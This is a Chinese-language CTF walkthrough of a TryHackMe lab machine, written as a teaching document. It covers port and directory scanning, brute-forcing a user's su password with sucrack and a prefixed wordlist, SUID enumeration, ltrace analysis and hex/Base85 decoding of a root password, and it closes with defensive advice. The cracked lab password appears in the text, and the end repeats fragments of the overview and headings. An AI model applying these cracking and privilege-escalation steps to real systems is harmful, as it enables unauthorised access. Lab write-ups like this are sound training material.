TryHackMe渗透测试实战教学文档<\/h1>

概述<\/h2>
本教学文档基于TryHackMe平台的CTF挑战，详细记录了从信息收集到最终获取root权限的完整渗透测试过程。文档将按照渗透测试的标准流程组织内容，涵盖Web安全、密码破解、权限提升等关键技术点。<\/p>

环境准备<\/h2>

目标系统：TryHackMe靶机<\/li>

工具准备：sucrack、010 Editor、ltrace、标准Linux工具<\/li> <\/ul>

渗透测试过程<\/h2>

1. 信息收集与侦察<\/h3>

1.1 端口扫描与服务识别<\/h4>

# 使用nmap进行端口扫描<\/span>
<\/span><\/span>nmap -sS -sV -p- <target_ip>
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

80\/tcp: HTTP服务<\/li>
21\/tcp: FTP服务<\/li>
<\/ul>
1.2 Web目录枚举<\/h4>
# 使用dirb或gobuster进行目录扫描<\/span>
<\/span><\/span>gobuster dir -u http:\/\/<target_ip> -w \/usr\/share\/wordlists\/dirb\/common.txt
<\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h3>
2.1 初始访问<\/h4>
访问80端口Web服务，发现以下关键信息：<\/p>

主站页面包含有用线索<\/li>
存在子域名或虚拟主机<\/li>
<\/ul>
2.2 文件发现<\/h4>
在\/var\/www\/html目录下发现关键文件：<\/p>
# 通过Web访问或目录遍历发现<\/span>
<\/span><\/span>\/var\/www\/html\/wwe3bbfla4g.txt  # 任务一标志文件<\/span>
<\/span><\/span><\/code><\/pre>3. 用户枚举与密码破解<\/h3>
3.1 用户发现<\/h4>
通过系统侦察发现存在用户：<\/p>

hakanbey（目标用户）<\/li>
<\/ul>
3.2 密码破解准备<\/h4>
工具准备：<\/strong>

下载sucrack工具：<\/p>
# 从Arch Linux仓库获取<\/span>
<\/span><\/span>wget https:\/\/archlinux.pkgs.org\/rolling\/archstrike-x86_64\/sucrack-1.2.3-3-x86_64.pkg.tar.xz
<\/span><\/span><\/code><\/pre>文件上传方法：<\/strong><\/p>

FTP上传（如果FTP服务允许）<\/li>
Apache Web目录上传（如果具有写权限）<\/li>
<\/ol>
3.3 密码字典优化<\/h4>
基于情报"密码都有123nada"前缀，优化密码字典：<\/p>
# 使用sed命令为密码字典添加前缀<\/span>
<\/span><\/span>sed 's\/^\/123nada\/'<\/span> password.txt > new_password.txt
<\/span><\/span><\/code><\/pre>3.4 执行密码破解<\/h4>
# 使用sucrack进行密码破解<\/span>
<\/span><\/span>.\/sucrack -u hakanbey -w 100<\/span> -b 500<\/span> new_password.txt
<\/span><\/span>
<\/span><\/span># 参数说明：<\/span>
<\/span><\/span># -u: 指定用户名<\/span>
<\/span><\/span># -w: 工作线程数<\/span>
<\/span><\/span># -b: 每个进程尝试的密码数<\/span>
<\/span><\/span><\/code><\/pre>破解结果：<\/strong>

成功获取hakanbey用户密码：123adanasubaru<\/code><\/p>
4. 权限提升：hakanbey → root<\/h3>
4.1 初始访问优化<\/h4>
提升shell交互体验：<\/p>
# 升级到完全交互式shell<\/span>
<\/span><\/span>python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>
<\/span><\/span># 切换用户<\/span>
<\/span><\/span>su hakanbey
<\/span><\/span># 输入密码：123adanasubaru<\/span>
<\/span><\/span><\/code><\/pre>4.2 寻找提权向量<\/h4>
方法一：SUID权限文件查找<\/strong><\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>方法二：替代查找命令<\/strong><\/p>
find \/ -perm \/4000 2>\/dev\/null
<\/span><\/span><\/code><\/pre>4.3 分析可疑二进制文件<\/h4>
发现可疑SUID二进制文件：\/usr\/bin\/binary<\/code><\/p>
使用ltrace进行动态分析：<\/strong><\/p>
ltrace \/usr\/bin\/binary
<\/span><\/span><\/code><\/pre>交互过程：<\/strong><\/p>

程序提示输入字符串<\/li>
输入：warzoneinadana<\/code><\/li>
输出：获得一张图片的提示<\/li>
<\/ol>
4.4 十六进制分析<\/h4>
使用010 Editor分析：<\/strong><\/p>

重点关注00000020行附近的数据<\/li>
发现编码的root密码线索<\/li>
<\/ol>
4.5 密码解码过程<\/h4>
解码流程：<\/strong><\/p>

From Hex<\/strong>: 将十六进制数据转换为可读格式<\/li>
Base85解码<\/strong>: 将Base85编码的数据解码为明文<\/li>
<\/ol>
示例命令：<\/strong><\/p>
# Python解码示例<\/span>
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span># 假设从十六进制分析获得的数据<\/span>
<\/span><\/span>hex_data =<\/span> "..."<\/span>  # 实际十六进制数据<\/span>
<\/span><\/span>decoded_hex =<\/span> bytes.<\/span>fromhex(hex_data)
<\/span><\/span>base85_decoded =<\/span> base64.<\/span>b85decode(decoded_hex)
<\/span><\/span>root_password =<\/span> base85_decoded.<\/span>decode('utf-8'<\/span>)
<\/span><\/span><\/code><\/pre>5. 最终权限获取<\/h3>
使用解码获得的root密码完成权限提升：<\/p>
su root
<\/span><\/span># 输入解码获得的root密码<\/span>
<\/span><\/span><\/code><\/pre>关键技术总结<\/h2>
5.1 密码破解技巧<\/h3>

字典优化<\/strong>: 基于目标特征（如已知前缀）优化密码字典<\/li>
工具选择<\/strong>: sucrack专门用于su密码破解，效率较高<\/li>
参数调优<\/strong>: 合理设置线程数和批量大小提升破解速度<\/li>
<\/ul>
5.2 权限提升方法<\/h3>

SUID利用<\/strong>: 查找具有SUID权限的可执行文件<\/li>
二进制分析<\/strong>: 使用ltrace进行动态跟踪分析<\/li>
数据隐写<\/strong>: 从二进制文件中提取隐藏信息<\/li>
<\/ul>
5.3 编码识别与解码<\/h3>

十六进制分析<\/strong>: 使用专业工具（010 Editor）进行深度分析<\/li>
编码识别<\/strong>: 识别Base85等不常见编码格式<\/li>
解码链<\/strong>: 建立正确的解码顺序（Hex → Base85）<\/li>
<\/ul>
防御建议<\/h2>
6.1 针对已发现漏洞的防护措施<\/h3>
6.1.1 密码安全<\/h4>
# 实施强密码策略<\/span>
<\/span><\/span># 禁用常见密码模式<\/span>
<\/span><\/span># 定期更换密码<\/span>
<\/span><\/span><\/code><\/pre>6.1.2 文件权限管理<\/h4>
# 定期审查SUID文件<\/span>
<\/span><\/span>find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span># 移除不必要的SUID权限<\/span>
<\/span><\/span>chmod u-s \/path\/to\/file
<\/span><\/span><\/code><\/pre>6.1.3 二进制安全<\/h4>

避免在二进制文件中硬编码敏感信息<\/li>
实施代码审查和安全测试<\/li>
使用代码混淆工具保护敏感逻辑<\/li>
<\/ul>
附录：工具命令速查<\/h2>
信息收集<\/h3>
nmap -sS -sV -p- <target_ip>
<\/span><\/span>gobuster dir -u http:\/\/<target_ip> -w wordlist.txt
<\/span><\/span><\/code><\/pre>密码破解<\/h3>
sed 's\/^\/prefix\/'<\/span> wordlist.txt > new_wordlist.txt
<\/span><\/span>.\/sucrack -u username -w 50<\/span> -b 200<\/span> wordlist.txt
<\/span><\/span><\/code><\/pre>权限提升<\/h3>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span>ltrace \/path\/to\/binary
<\/span><\/span><\/code><\/pre>编码解码<\/h3>
# Hex解码<\/span>
<\/span><\/span>bytes.<\/span>fromhex(hex_string)
<\/span><\/span>
<\/span><\/span># Base85解码<\/span>
<\/span><\/span>base64.<\/span>b85decode(encoded_data)
<\/span><\/span><\/code><\/pre>本教学文档完整记录了从初始访问到最终获取root权限的全过程，涵盖了现代渗透测试中的关键技术和分析方法。通过系统性地应用这些技术，安全专业人员可以更好地理解系统漏洞并实施有效的防护措施。<\/p>

TryHackMe渗透测试实战教学文档<\/h1>

概述<\/h2> 本教学文档基于TryHackMe平台的CTF挑战，详细记录了从信息收集到最终获取root权限的完整渗透测试过程。文档将按照渗透测试的标准流程组织内容，涵盖Web安全、密码破解、权限提升等关键技术点。<\/p>

渗透测试过程<\/h2>

1. 信息收集与侦察<\/h3>

2. Web应用渗透<\/h3>

3. 用户枚举与密码破解<\/h3>

关键技术总结<\/h2>

防御建议<\/h2>

6.1 针对已发现漏洞的防护措施<\/h3>

附录：工具命令速查<\/h2>

概述<\/h2>
本教学文档基于TryHackMe平台的CTF挑战，详细记录了从信息收集到最终获取root权限的完整渗透测试过程。文档将按照渗透测试的标准流程组织内容，涵盖Web安全、密码破解、权限提升等关键技术点。<\/p>